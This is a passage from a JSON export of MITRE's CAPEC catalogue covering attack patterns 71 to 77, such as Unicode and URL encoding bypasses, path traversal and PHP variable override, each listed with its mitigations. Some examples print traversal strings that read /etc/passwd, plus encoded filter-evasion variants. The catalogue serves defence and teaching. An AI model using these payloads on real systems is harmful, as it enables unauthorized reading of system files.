Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, References, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Try Common(default) Usernames and Passwords",{"Date":"2017-08-04"}]}},"71":{"ID":"71","Name":"Using Unicode Encoding to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":["Try to use Unicode encoding of content in Scripts in order to bypass validation routines.","Try to use Unicode encoding of content in HTML in order to bypass validation routines.","Try to use Unicode encoding of content in CSS in order to bypass validation routines."]}]},"Prerequisites":{"Prerequisite":"Filtering is performed on data that has not be properly canonicalized."},"Skills_Required":{"Skill":["An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware.",{"Level":"Medium"}]},"Indicators":{"Indicator":"Unicode encoded data is passed to APIs where it is not expected"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.","Ensure that filtering or input validation is applied to canonical data.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"div":["Attack Example: Unicode Encodings in the IIS Server",{"style":"color:#32498D; font-weight:bold;"},"http://target.server/some_directory/../../../winnt",{"style":"margin-left:10px;","class":"informative"},". yields C0 AE",{"style":"margin-left:10px;","class":"informative"},"http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winnt",{"style":"margin-left:10px;","class":"informative"}],"p":["A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is","In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.","In October 2000, an adversary publicly revealed that Microsoft\'s IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are","Using this conversion, the previously displayed URL can be encoded as"]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"176"},{"CWE_ID":"179"},{"CWE_ID":"180"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"184"},{"CWE_ID":"183"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Unicode Encoding"}},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"72":{"ID":"72","Name":"URL Encoding","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker accesses the server using a specific URL."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries to encode some special characters in the URL. The attacker finds out that some characters are not filtered properly."},{"Step":"3","Phase":"Exploit","Description":"The attacker crafts a malicious URL string request and sends it to the server."},{"Step":"4","Phase":"Exploit","Description":"The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters may have harmful consequences."}]},"Prerequisites":{"Prerequisite":["The application should accepts and decodes URL input.","The application performs insufficient filtering/canonicalization on the URLs."]},"Skills_Required":{"Skill":["An attacker can try special characters in the URL and bypass the URL validation.",{"Level":"Low"},"The attacker may write a script to defeat the input filtering mechanism.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks."]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section)","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible."]},"Example_Instances":{"Example":[{"p":["Attack Example: URL Encodings in IceCast MP3 Server.","The following type of encoded string has been known traverse directories against the IceCast MP3 server9:","or using","The control character \\"..\\" can be used by an attacker to escape the document root."],"div":["http://[targethost]:8000/somefile/%2E%2E/target.mp3",{"style":"margin-left:10px;","class":"informative"},"\\"/%25%25/\\" instead of \\"/../\\".",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Cross-Site Scripting","[REF-495]"],"div":[{"style":"margin-left:10px;","class":"attack","div":["URL-Encoded attack:",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"result","div":["HTML execution:",{"style":"color:#32498D; font-weight:bold;"}]}]},{"p":["SQL Injection","From \\"URL encoded attacks\\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html"],"div":[{"style":"margin-left:10px;","class":"informative","div":["Original database query in the example file - \\"login.asp\\":",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"attack","div":["URL-encoded attack:",{"style":"color:#32498D; font-weight:bold;"}]},{"style":"margin-left:10px;","class":"result","div":["Executed database query:",{"style":"color:#32498D; font-weight:bold;"}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"177"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-495"},{"External_Reference_ID":"REF-496"},{"External_Reference_ID":"REF-497"},{"External_Reference_ID":"REF-498"},{"External_Reference_ID":"REF-499"},{"External_Reference_ID":"REF-500","Section":"5.11.4. Validating Hypertext Links (URIs/URLs)"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"73":{"ID":"73","Name":"User-Controlled Filename","Abstraction":"Standard","Status":"Draft","Description":"An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"165"},{"Nature":"CanPrecede","CAPEC_ID":"592"}]},"Prerequisites":{"Prerequisite":"The victim must trust the name and locale of user controlled filenames."},"Skills_Required":{"Skill":["To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename",{"Level":"Low"},"Deploying a malicious \\"look-a-like\\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into.",{"Level":"Medium"},"Exploiting a client side vulnerability to inject malicious scripts into the browser\'s executable process.",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Availability","Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Use browser technologies that do not allow client side scripting.","Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification.","Implementation: Perform input validation for all remote content.","Implementation: Perform output validation for all remote content.","Implementation: Disable scripting languages such as JavaScript in browser","Implementation: Scan dynamically generated content against validation specification"]},"Example_Instances":{"Example":"Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user\'s email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim\'s host system and network environment."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"20"},{"CWE_ID":"184"},{"CWE_ID":"96"},{"CWE_ID":"348"},{"CWE_ID":"116"},{"CWE_ID":"350"},{"CWE_ID":"86"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"}}},"74":{"ID":"74","Name":"Manipulating State","Abstraction":"Meta","Status":"Stable","Description":{"p":["The adversary modifies state information maintained by the target software or causes a state transition in hardware. If successful, the target will use this tainted state and execute in an unintended manner.","State management is an important function within a software application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an adversary to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits.","If there is a hardware logic error in a finite state machine, the adversary can use this to put the system in an undefined state which could cause a denial of service or exposure of secure data."]},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Adversary determines the nature of state management employed by the target. This includes determining the location (client-side, server-side or both applications) and possibly the items stored as part of user state."},{"Step":"2","Phase":"Experiment","Description":"The adversary now tries to modify the user state contents (possibly indiscriminately if the contents are encrypted or otherwise obfuscated) or cause a state transition and observe the effects of this change on the target."},{"Step":"3","Phase":"Exploit","Description":"Having determined how to manipulate the state, the adversary can perform illegitimate actions."}]},"Prerequisites":{"Prerequisite":["User state is maintained at least in some way in user-controllable locations, such as cookies or URL parameters.","There is a faulty finite state machine in the hardware logic that can be exploited."]},"Skills_Required":{"Skill":["The adversary needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary needs a data tampering tool capable of generating and creating custom inputs to aid in the attack, like Fiddler, Wireshark, or a similar in-browser plugin (e.g., Tamper Data for Firefox)."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state.","Avoid sensitive information, such as usernames or authentication and authorization information, in user-controllable locations.","Sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request.","All possible states must be handled by hardware finite state machines."]},"Example_Instances":{"Example":{"p":["During the authentication process, an application stores the authentication decision (auth=0/1) in unencrypted cookies. At every request, this cookie is checked to permit or deny a request.","An adversary can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"372"},{"CWE_ID":"315"},{"CWE_ID":"353"},{"CWE_ID":"693"},{"CWE_ID":"1245"},{"CWE_ID":"1253"},{"CWE_ID":"1265"},{"CWE_ID":"1271"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Execution_Flow, Related_Weaknesses"}],"Previous_Entry_Name":["Manipulating User State",{"Date":"2020-07-30"}]}},"75":{"ID":"75","Name":"Manipulating Writeable Configuration Files","Abstraction":"Standard","Status":"Draft","Description":"Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers\' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":[{"Exclude_ID":"437"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Configuration files must be modifiable by the attacker"},"Skills_Required":{"Skill":["To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Backup copies of all configuration files","Implementation: Integrity monitoring for configuration files","Implementation: Enforce audit logging on code and configuration promotion procedures.","Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD"]},"Example_Instances":{"Example":{"p":["The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml","The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect."],"div":["< CustomRealm",{"style":"margin-left:10px;","class":"informative","div":["ConfigurationData=\\"java.util.Properties\\"",{"style":"margin-left:10px;"}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"349"},{"CWE_ID":"99"},{"CWE_ID":"77"},{"CWE_ID":"346"},{"CWE_ID":"353"},{"CWE_ID":"354"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"76":{"ID":"76","Name":"Manipulating Web Input to File System Calls","Abstraction":"Detailed","Status":"Draft","Description":"An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"126"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to create a valid file injection, the attacker needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application to Identify User-controllable Inputs] The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user","Technique":["Spider web sites for all available links, entry points to the web site.","Manually explore application and inventory all application inputs"]},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results] Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application","Technique":["Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.)","Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests","Inject context-appropriate malicious file system control syntax"]},{"Step":"4","Phase":"Exploit","Description":"[Manipulate files accessible by the application] The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)","Technique":["The attacker injects context-appropriate malicious file path to access the content of the targeted file.","The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file.","The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file.","The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file.","The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file.","The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file."]}]},"Prerequisites":{"Prerequisite":"Program must allow for user controlled variables to be applied directly to the filesystem"},"Skills_Required":{"Skill":["To identify file system entry point and execute against an over-privileged system interface",{"Level":"Low"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege.","Design: Ensure all input is validated, and does not contain file system commands","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables."]},"Example_Instances":{"Example":{"p":["The attacker uses relative path traversal to access files in the application. This is an example of accessing user\'s password file.","However, the target application employs regular expressions to make sure no relative path sequences are being passed through the application to the web page. The application would replace all matches from this regex with the empty string.","Then an attacker creates special payloads to bypass this filter:","When the application gets this input string, it will be the desired vector by the attacker."],"div":["http://www.example.com/getProfile.jsp?filename=../../../../etc/passwd",{"style":"margin-left:10px;","class":"attack"},"http://www.example.com/getProfile.jsp?filename=%2e%2e/%2e%2e/%2e%2e/%2e%2e /etc/passwd",{"style":"margin-left:10px;","class":"attack"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"23"},{"CWE_ID":"22"},{"CWE_ID":"73"},{"CWE_ID":"77"},{"CWE_ID":"346"},{"CWE_ID":"348"},{"CWE_ID":"285"},{"CWE_ID":"272"},{"CWE_ID":"59"},{"CWE_ID":"74"},{"CWE_ID":"15"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Examples-Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Manipulating Input to File System Calls",{"Date":"2017-01-09"}]}},"77":{"ID":"77","Name":"Manipulating User-Controlled Variables","Abstraction":"Standard","Status":"Draft","Description":"This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An attacker can override environment variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the attacker can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"22","Exclude_Related":{"Exclude_ID":"512"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker communicates with the application server using a thin client (browser) or thick client."},{"Step":"2","Phase":"Experiment","Description":"While communicating with the server, the attacker finds that they can control and override a variable consumed by the application server."},{"Step":"3","Phase":"Exploit","Description":"The attacker overrides the variable and influences the normal behavior of the application server."}]},"Prerequisites":{"Prerequisite":["A variable consumed by the application server is exposed to the client.","A variable consumed by the application server can be overwritten by the user.","The application server trusts user supplied data to compute business logic.","The application server does not perform proper input validation."]},"Skills_Required":{"Skill":["The malicious user can easily try some well-known global variables and find one which matches.",{"Level":"Low"},"The attacker can use automated tools to probe for variables that they can control.",{"Level":"Medium"}]},"Indicators":{"Indicator":"A web penetration tool probing a web server may generate abnormal activities recorded on log files. Abnormal traffic such as a high number of request coming from the same client may also rise the warnings from a monitoring system or an intrusion detection tool."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":[{"p":["Do not allow override of global variables and do Not Trust Global Variables.","If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. For instance make sure that the server setting for PHP does not expose global variables."]},"A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary.","Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. This is to prevent computation of business logic from user controlled input data.","Use encapsulation when declaring your variables. This is to lower the exposure of your variables.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should be rejected by the program."]},"Example_Instances":{"Example":{"div":["Attack Example: PHP Global Variables",{"style":"color:#32498D; font-weight:bold;"},"while($count < 10){",{"style":"margin-left:10px;","class":"informative"},"GET /login.php?count=9",{"style":"margin-left:10px;","class":"informative"}],"p":["PHP is a study in bad security. The main idea pervading PHP is \\"ease of use,\\" and the mantra \\"don\'t make the developer go to any extra work to get stuff done\\" applies in all cases. This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.","One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.","Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:","Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as","and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.","Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. If an attacker can supply a new $PATH variable (such as PATH=\'/var\'), the program may be exploitable.","PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.","Consider another example of this problem in which a program defines a variable called $tempfile. An attacker can supply a new temp file such as $tempfile = \\"/etc/passwd\\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.","Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \\"Trojaned\\" (the attacker can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.","Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"15"},{"CWE_ID":"94"},{"CWE_ID":"96"},{"CWE_ID":"285"},{"CWE_ID":"302"},{"CWE_ID":"473"},{"CWE_ID":"1321"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-520"},{"External_Reference_ID":"REF-521"},{"External_Reference_ID":"REF-522","Section":"Chapter 29. Using Register Globals"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE 